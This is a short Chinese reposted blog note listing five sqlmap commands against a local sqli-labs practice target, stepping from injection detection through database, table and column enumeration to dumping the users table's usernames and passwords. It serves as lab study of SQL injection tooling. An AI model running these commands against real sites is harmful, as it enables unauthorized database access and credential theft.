【20171116早】sqlmap 扫描sql注入漏洞

本文转载自查看原文 2017-11-16 07:41 1108

sqlmap发现并利用sql注入的利器，值得记录使用过程：

1、检测是否存在漏洞：
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3
2、获取数据库信息：
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 --dbs
3、数据库表信息：
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 -D security --tables
4、表中字段信息
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users --columns
5、字段值数据
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users -C "username,password" --dump

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 SQLmap检测sql注入漏洞 sqlmap查找SQL注入漏洞入门 SQL注入以及漏洞扫描学习，工具整理 SQL注入之sqlmap进阶2 SQL注入之SQLmap入门 DVWA 之 sql注入+ sqlmap Sql注入测试--Sqlmap SQL注入之sqlmap进阶 SQL学习之SqlMap SQL注入 sqlmap扫描发现注入点示例